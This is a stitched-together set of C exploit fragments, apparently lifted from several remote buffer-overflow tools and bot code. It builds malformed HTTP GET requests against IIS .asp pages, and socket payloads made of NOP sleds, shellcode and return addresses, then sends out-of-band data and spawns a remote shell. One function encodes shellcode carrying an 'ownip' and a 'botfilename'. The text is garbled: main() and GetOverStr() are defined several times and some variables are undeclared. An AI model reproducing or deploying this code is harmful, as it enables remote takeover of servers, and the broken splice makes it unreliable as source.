//*
int main() {
GetShellcode();
PrintSc(sh_Buff, sh_Len);
//void(*code)() = (void *)sh_Buff;
//code();
}
int GetOverStr(char *buffer,char *server,char *urlfile,int offset)
{
char shellcodebuff[BUFFSIZE];
char overbuff[BUFFSIZE];
int i,j;
char *url="/iisstart.asp";
char overstr[]="GET %s?!!ko HTTP/1.1\r\nHOST:%s\r\nContent-Type: application/x-www-form-urlencoded%s\r\nContent-length: 2147506431\r\n\r\n";
if(urlfile!=NULL) url=urlfile;
memset(shellcodebuff,'7',BUFFSIZE);//NOPCODE,BUFFSIZE);
i=getoverbuff(overbuff);
j=GetShellcode(shellcodebuff+0x1000);
for(j=0;j<=0xe000;j+=4)
{
strcat(shellcodebuff,"\x41\x41\x41\x41");
}
_snprintf(buffer,BUFFSIZE,overstr,url,server,shellcodebuff);
j=strlen(buffer);
memcpy(buffer+j,overbuff,i);
return (j+i);
}
int GetOverStr(char *buffer,char *server,char *urlfile,int offset2)
{
char findshellcodebuff[BUFFSIZE];
char shellcodebuff[BUFFSIZE];
char overbuff[BUFFSIZE];
int i,findshellbytes,postbytes;
char *url="/default.asp";
char overstr[]="GET %s%s?koko HTTP/1.1\r\nHOST:%s\r\nContent-Type: text/html\r\n\r\n";
if(urlfile!=NULL) url=urlfile;
offset=offset-strlen(url)-4;
i=getoverbuff(overbuff);
// findshellbytes=GetFindShellcode(findshellcodebuff);
postbytes=GetShellcode(shellcodebuff);
memcpy(overbuff+0x730,shellcodebuff,postbytes);
_snprintf(buffer,BUFFSIZE,overstr,url,overbuff,server); //,i,overbuff); //,shellcodebuff);
// strcpy(buffer+strlen(buffer)+1,shellcodebuff);
return (strlen(buffer)); //+postbytes+1);
}
int main(int argc, char *argv[]) {
unsigned char Buff[1024];
unsigned char data;
unsigned long *ps;
int s, i, k;
if (argc < 3) {
fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
return -1;
}
s = Make_Connection(argv[1], atoi(argv[2]), 10);
if (!s) {
fprintf(stderr, "[-] Connect failed. \n");
return -1;
}
GetShellcode();
ps = (unsigned long *)Buff;
for(i=0; i<sizeof(Buff)/4; i++)
{
*(ps++) = 0x60000000;
}
i = sh_Len % 4;
memcpy(&Buff[sizeof(Buff) - sh_Len], sh_Buff, sh_Len);
ps = (unsigned long *)Buff;
for(i=0; i<92/4; i++)
{
*(ps++) = RET;
}
Buff[sizeof(Buff)] = 0;
//PrintSc(Buff, sizeof(Buff));
i = send(s, Buff, sizeof(Buff), 0);
if (i <= 0) {
fprintf(stderr, "[-] Send failed. \n");
return -1;
}
data='I';
i = send(s, &data, 1, 1);
if (i <= 0) {
fprintf(stderr, "[-] Send OOB data failed. \n");
return -1;
}
sleep (1);
shell(s);
}
DWORD GetRNS0TerminatedShellcode(char *buffer, DWORD buffersize, char *ownip, char *botfilename)
{
DWORD RNS0TerminatedShellcodeSize = GetRNS0TerminatedShellcodeSize(ownip, botfilename);
if (RNS0TerminatedShellcodeSize > buffersize) return 0;
if (RNS0TerminatedShellcodeSize > 65535) return 0;
char *Shellcode = (char *)malloc(GetShellcodeSize(ownip, botfilename)+257);
DWORD ShellcodeSize = GetShellcode(Shellcode, GetShellcodeSize(ownip, botfilename), ownip, botfilename);
RNS0TerminatedShellcodeSize = EncodeRNS0(buffer, buffersize, Shellcode, ShellcodeSize);
free(Shellcode);
return RNS0TerminatedShellcodeSize;
}
int main(int argc, char *argv[]) {
unsigned char Buff[1024];
unsigned char data;
unsigned long *ps;
int s, i;
if (argc < 3) {
fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
return -1;
}
s = Make_Connection(argv[1], atoi(argv[2]), 10);
if (!s) {
fprintf(stderr, "[-] Connect failed. \n");
return -1;
}
GetShellcode();
PrintSc(sh_Buff, sh_Len);
memset(Buff, 0x90, sizeof(Buff));
strcpy(Buff + (sizeof(Buff) - sh_Len - 1), sh_Buff);
ps = (unsigned long *)Buff;
for(i=0; i<128/4; i++)
{
*(ps++) = RET;
}
Buff[sizeof(Buff) - 1] = 0;
i = send(s, Buff, sizeof(Buff), 0);
if (i <= 0) {
fprintf(stderr, "[-] Send failed. \n");
return -1;
}
data='I';
i = send(s, &data, 1, 1);
if (i <= 0) {
fprintf(stderr, "[-] Send OOB data failed. \n");
return -1;
}
sleep (1);
// get shell use same socket
shell(s);
}
